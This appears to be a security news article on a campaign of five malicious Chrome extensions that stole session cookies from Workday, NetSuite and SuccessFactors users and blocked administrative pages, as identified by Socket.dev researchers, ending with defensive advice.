Five meticulously crafted malicious Chrome extensions are posing a significant threat to enterprise security, strategically targeting popular human resources and enterprise resource planning (ERP) platforms. These extensions, operating in concert, aim to steal critical authentication tokens, disable vital security controls, and ultimately achieve complete account takeover through session hijacking. The campaign specifically targets widely-used systems like Workday, NetSuite, and SAP SuccessFactors, which are essential for managing sensitive employee and financial data in thousands of organizations globally.
The threat actors behind this sophisticated operation have released four extensions under the umbrella name “databycloud1104,” while a fifth, branded as “Software Access,” operates independently but shares identical underlying infrastructure and attack methodologies. Combined, these malicious extensions have already infiltrated over 2,300 users across various enterprise environments. The synchronized deployment of these extensions highlights a well-planned attack strategy designed to bypass standard cybersecurity defenses.
According to analysts at Socket.dev, who identified these extensions through in-depth code analysis, the malicious functionality remained hidden behind misleading marketing claims. These extensions are advertised as legitimate productivity tools to streamline multi-account access. However, in reality, they are designed to steal user credentials and strategically hinder security teams’ ability to respond to ongoing attacks effectively.
Advanced Attack Techniques for Enterprise Takeover
A particularly concerning capability is the bidirectional cookie injection implemented by the Software Access extension. This advanced technique allows threat actors to directly inject stolen authentication cookies into their own browsers. This grants them immediate access to victim accounts, bypassing the need for passwords and rendering multi-factor authentication (MFA) protections obsolete. Other extensions in the campaign are configured to continuously extract session tokens every 60 seconds. This ensures that attackers maintain up-to-date credentials, even when users log out and log back in during regular business operations, maintaining persistent unauthorized access.
The coordinated nature of these malicious Chrome extensions underscores a growing trend in cyber threats targeting business-critical applications. While many threats focus on initial access, this campaign focuses on maintaining deep, persistent access and actively preventing remediation, representing a significant escalation in the sophistication of browser-based attacks against corporate infrastructure.
Infection Mechanism and Persistence Through Administrative Blocking
These extensions employ a multi-pronged infection and persistence mechanism. Beyond credential theft, they actively thwart incident response efforts by blocking access to administrative interfaces. The attack leverages DOM manipulation, enabling the extensions to constantly monitor page content. When users attempt to access security administration pages, the extensions immediately erase the content and redirect users to non-functional URLs.
Specifically, the “Tools Access 11” extension has been observed blocking 44 administrative pages within Workday. The “Data By Cloud 2” extension expands this blockade to an additional 12 pages, encompassing critical functions such as password reset functionalities, account deactivation procedures, multi-factor authentication device management, and security audit log access. This comprehensive blocking strategy effectively cripples an organization’s ability to respond to an in-progress security breach.
The persistent blocking mechanism is powered by continuous monitoring using MutationObserver functions. These functions actively check the page content every 50 milliseconds. Consequently, when administrators attempt to perform essential security actions, like resetting a password or deactivating a compromised account, the extensions replace the entire page with a blank screen and redirect the user to a malformed URL. This creates a critical containment failure, leaving organizations in a precarious position. They are forced to either permit ongoing unauthorized access or undertake the complex and disruptive process of migrating affected users to entirely new accounts.
The identified domains associated with these malicious extensions, databycloud[.]com and software-access[.]com, are currently inactive or exhibit errors, indicating potential efforts by the threat actors to cover their tracks or a temporary disruption in their infrastructure. However, the underlying code and attack patterns remain the primary concern for security professionals.
Moving forward, organizations utilizing Workday, NetSuite, or SuccessFactors are advised to audit their browser extensions rigorously and implement enhanced endpoint detection and response (EDR) solutions. The ongoing analysis of these malicious Chrome extensions by security researchers will likely lead to further details on their operational infrastructure and potential impacts. The persistent nature of such attacks necessitates continuous vigilance and proactive security measures to protect sensitive enterprise data and operations.